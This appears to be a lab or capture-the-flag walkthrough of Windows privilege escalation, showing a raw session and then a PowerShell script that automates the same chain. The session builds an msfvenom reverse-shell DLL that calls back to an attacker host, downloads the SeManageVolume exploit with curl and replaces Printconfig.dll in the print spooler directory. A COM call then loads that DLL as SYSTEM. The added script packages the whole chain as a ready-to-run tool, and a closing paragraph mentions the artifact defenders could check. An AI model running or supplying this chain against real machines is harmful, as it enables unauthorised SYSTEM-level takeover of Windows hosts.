Administrator

PS C:\programdata> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                      State   
============================= ================================ ========
SeMachineAccountPrivilege     Add workstations to domain       Disabled
SeChangeNotifyPrivilege       Bypass traverse checking         Enabled 
SeManageVolumePrivilege       Perform volume maintenance tasks Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set   Disabled
$ msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=192.168.45.233 LPORT=1339 -f dll > privme.dll
PS C:\programdata> curl 192.168.45.233/SeManageVolumeExploit.exe -o SeManageVolumeExploit.exe
PS C:\programdata> .\SeManageVolumeExploit.exe
Entries changed: 922
DONE 
PS C:\programdata> curl 192.168.45.233/Printconfig.dll -o Printconfig.dll
PS C:\programdata> cmd
C:\programdata>copy Printconfig.dll C:\Windows\System32\spool\drivers\x64\3\
Overwrite C:\Windows\System32\spool\drivers\x64\3\Printconfig.dll? (Yes/No/All): Yes
        1 file(s) copied.
$ nc -lnvp 1339
listening on [any] 1339 ...
PS C:\ProgramData> $type = [Type]::GetTypeFromCLSID("{854A20FB-2D44-457D-992F-EF13785D2B51}")
PS C:\ProgramData> $object = [Activator]::CreateInstance($type)
$ nc -lnvp 1339
listening on [any] 1339 ...
connect to [192.168.45.233] from (UNKNOWN) [192.168.170.187] 49854
Microsoft Windows [Version 10.0.17763.2746]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system

C:\Windows\system32>type C:\Users\Administrator\Desktop\proof.txt
10e683eaa6bf8936a7d3803862ab79c6

C:\Windows\system32>ipconfig

Windows IP Configuration


Ethernet adapter Ethernet0 2:

   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 192.168.170.187
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.170.254

C:\Windows\system32>
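The same chain as above (SeManageVolumePrivilege exploit, overwrite of Printconfig.dll in the spool driver directory, COM instantiation of CLSID {854A20FB-2D44-457D-992F-EF13785D2B51} to get the DLL loaded as SYSTEM), rewritten as one PowerShell script with the checks and cleanup the raw session does not show: confirm the privilege is actually on the token, prove the exploit made the target file writable before touching it, keep a hash and a copy of the original DLL, and restore it afterwards. This is an added example, not code from the original write-up or from the exploit's author; the file paths, the backup name and the restore step are assumptions, and it expects the exploit binary and payload DLL to already be in C:\programdata with the listener running.

```powershell
# Added example, not from the original session. Assumes SeManageVolumeExploit.exe and the
# msfvenom DLL (already named Printconfig.dll) sit in C:\programdata and nc is listening.
$ErrorActionPreference = 'Stop'

$exploit = 'C:\programdata\SeManageVolumeExploit.exe'
$payload = 'C:\programdata\Printconfig.dll'
$target  = 'C:\Windows\System32\spool\drivers\x64\3\Printconfig.dll'
$backup  = 'C:\programdata\Printconfig.dll.orig'          # assumed backup location
$clsid   = '{854A20FB-2D44-457D-992F-EF13785D2B51}'       # CLSID used on the page

# 1. The privilege only needs to be assigned; whoami /priv lists it as "Disabled" and the
#    exploit enables it on its own token.
$privs = whoami /priv
if (-not ($privs -match 'SeManageVolumePrivilege')) {
    throw 'SeManageVolumePrivilege is not on this token; this chain does not apply.'
}

# 2. Record what the legitimate DLL looks like so the restore can be verified.
$origHash = (Get-FileHash -Path $target -Algorithm SHA256).Hash
$origSig  = (Get-AuthenticodeSignature -FilePath $target).Status
Write-Host "Before: SHA256=$origHash signature=$origSig"

# 3. Run the exploit; on the page it reported "Entries changed: 922".
& $exploit

# 4. Do not trust the count: prove the target file is now writable by opening it for write
#    (FileMode.Open does not truncate; FileShare.ReadWrite tolerates a loaded DLL).
try {
    $fs = [System.IO.File]::Open($target, [System.IO.FileMode]::Open,
                                 [System.IO.FileAccess]::Write,
                                 [System.IO.FileShare]::ReadWrite)
    $fs.Close()
} catch {
    throw "Still cannot write $target after the exploit: $($_.Exception.Message)"
}

# 5. Back up the original, then drop the payload in its place (same as the copy on the page).
Copy-Item -Path $target -Destination $backup -Force
Copy-Item -Path $payload -Destination $target -Force

# 6. Instantiate the COM class; its server process runs as SYSTEM and loads the replaced DLL,
#    which is when the reverse shell connects back.
$type   = [Type]::GetTypeFromCLSID($clsid)
$object = [Activator]::CreateInstance($type)
Write-Host 'COM object created; check the listener.'

# 7. Put the signed DLL back and confirm the hash matches what was recorded in step 2.
try {
    Copy-Item -Path $backup -Destination $target -Force
    $newHash = (Get-FileHash -Path $target -Algorithm SHA256).Hash
    if ($newHash -ne $origHash) { Write-Warning "Restore mismatch: $newHash != $origHash" }
    else { Write-Host 'Original Printconfig.dll restored.' }
} catch {
    Write-Warning "Restore failed (DLL probably still loaded): $($_.Exception.Message)"
}
```

The restore in step 7 can fail with a sharing violation while the service process that loaded the payload DLL is still alive; in that case repeat the copy once the reverse shell process has exited. The hash and Authenticode status recorded in step 2 are also exactly what a defender would compare against: an unsigned or hash-mismatched Printconfig.dll under spool\drivers\x64\3 is the artifact this chain leaves behind.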
